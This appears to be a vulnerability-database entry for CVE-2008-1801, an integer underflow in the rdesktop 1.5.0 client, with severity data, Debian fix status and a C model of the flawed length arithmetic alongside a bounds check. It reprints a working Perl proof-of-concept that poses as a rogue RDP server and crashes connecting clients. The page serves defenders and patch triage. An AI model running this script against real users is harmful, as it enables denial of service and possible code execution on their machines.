CVE-2008-1801

Severity: unknown
CVSS v3: not scored · CVSS v4: not yet in upstream
VIR risk: 1.0

Description

Integer underflow in the iso_recv_msg function (iso.c) in rdesktop 1.5.0 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a Remote Desktop Protocol (RDP) request with a small length field.

iso_recv_msg runs in the rdesktop client's receive path, so the "remote attacker" here is the RDP server the client connects to (or a party able to spoof or tamper with that connection), not an unauthenticated client of the machine running rdesktop. A TPKT length field smaller than the 4-byte TPKT header itself makes the length-minus-header arithmetic wrap to a huge read size.

Predictions

Exploit likelihood: 20%
Patch ETA: none given

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

Scoping caveat: the vulnerable code is in the rdesktop client, so only clients that connect to untrusted or attacker-controlled RDP servers (or over a path where the server's replies can be tampered with) are exposed. The Debian package versions carrying the fix are listed under OS impact.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-5561 · DoS · Linux · verified · Perl · 1 KB
Author: Guido Landi · 2008-05-08

rdesktop 1.5.0 - 'iso_recv_msg()' Integer Underflow (PoC)

Source: Exploit-DB (Perl). The script plays the RDP server: it listens on TCP/3389 and answers each connecting rdesktop client with a TPKT header whose length field is 1, smaller than the 4-byte header it sits in.

#!/usr/bin/perl
#
# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=696

use warnings;
use strict;
use IO::Socket;

# Act as the RDP server: the vulnerable code is in the rdesktop client.
my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '3389', Listen => 1, Reuse => 1) || die($!);

while(my $c = $sock->accept())
{
        print $c        "\x03"                          .# TPKT version
                        "\x00"                          .# reserved
                        "\x00\x01"                      .# evil length here: 1 < 4-byte header, so length-4 underflows
                        "\x06\xd0\x00\x00\x12\x34\x00"  .# X.224 Connection Confirm: LI=6, code 0xd0, dst ref, src ref, class 0
                        "\x41" x 204942;                 # filler the client tries to read into its receive stream

        sleep 1;
        close $c;       # drop this client; keep the listener for the next one
}

# milw0rm.com [2008-05-08]
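To show what the 1-byte TPKT length sent by the PoC does inside the client, here is a small C model of the header arithmetic. It is an example added for this page, not rdesktop's source: the constants POC_TPKT_HEADER and GOOD_TPKT_HEADER are constructed from the PoC bytes above, the function names are mine, only the TPKT (version 3) path is modelled, and the lower-bound check in body_len_checked is the kind of check that closes the hole (compare it against the upstream patch rather than treating it as the patch).

```c
#include <stdint.h>
#include <stdio.h>

/* Model of the TPKT length handling behind CVE-2008-1801, written for this
 * page as an illustration; it is not rdesktop's source.  The client reads a
 * 4-byte TPKT header, takes the 16-bit big-endian length from bytes 2..3
 * (the length covers the whole packet, header included), and then requests
 * (length - 4) more bytes from the transport. */

#define TPKT_HDR_LEN 4

/* First four bytes the PoC server sends: version 3, reserved 0,
 * length 0x0001 (constructed from the PoC, not captured traffic). */
const uint8_t POC_TPKT_HEADER[TPKT_HDR_LEN]  = { 0x03, 0x00, 0x00, 0x01 };
/* A well-formed header for an 11-byte packet (4-byte TPKT + 7-byte X.224). */
const uint8_t GOOD_TPKT_HEADER[TPKT_HDR_LEN] = { 0x03, 0x00, 0x00, 0x0b };

static uint16_t tpkt_length(const uint8_t hdr[TPKT_HDR_LEN])
{
    return (uint16_t)((hdr[2] << 8) | hdr[3]);
}

/* Vulnerable shape: body size computed with no lower bound.  'length' is
 * promoted to int for the subtraction, so 1 - 4 = -3, and converting that
 * to the unsigned byte count a tcp_recv-style function takes yields
 * 0xFFFFFFFD: the client now tries to read about 4 GiB into its stream. */
uint32_t body_len_vulnerable(const uint8_t hdr[TPKT_HDR_LEN])
{
    uint16_t length = tpkt_length(hdr);
    return (uint32_t)(length - TPKT_HDR_LEN);
}

/* Hardened shape: the length must at least cover its own header (this bound
 * is mine; check it against the upstream patch).  Returns -1 on a bad
 * header, otherwise the body length, 0..65531. */
int32_t body_len_checked(const uint8_t hdr[TPKT_HDR_LEN])
{
    if (hdr[0] != 0x03)              /* only the TPKT (version 3) path is modelled */
        return -1;
    uint16_t length = tpkt_length(hdr);
    if (length < TPKT_HDR_LEN)       /* would underflow: reject instead */
        return -1;
    return (int32_t)(length - TPKT_HDR_LEN);
}

int main(void)
{
    printf("PoC header : vulnerable asks for %u bytes, checked returns %d\n",
           (unsigned)body_len_vulnerable(POC_TPKT_HEADER),
           (int)body_len_checked(POC_TPKT_HEADER));
    printf("good header: vulnerable asks for %u bytes, checked returns %d\n",
           (unsigned)body_len_vulnerable(GOOD_TPKT_HEADER),
           (int)body_len_checked(GOOD_TPKT_HEADER));
    return 0;
}
```

The subtraction is the whole bug: the 16-bit length is widened to int, goes negative, and is then handed to an unsigned byte count. Rejecting any length below the header size before subtracting is what keeps the read bounded; the checked version also refuses non-TPKT headers because the model does not implement the other encoding the real function accepts.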

OS impact

Debian: fixed in 5 releases

Release    Status   Fixed in
trixie     Fixed    1.5.0-4+cvs20071006
sid        Fixed    1.5.0-4+cvs20071006
forky      Fixed    1.5.0-4+cvs20071006
bullseye   Fixed    1.5.0-4+cvs20071006
bookworm   Fixed    1.5.0-4+cvs20071006

References

iDefense Labs advisory (id=696): http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=696
Exploit-DB EDB-5561: rdesktop 1.5.0 - 'iso_recv_msg()' Integer Underflow (PoC), Guido Landi, 2008-05-08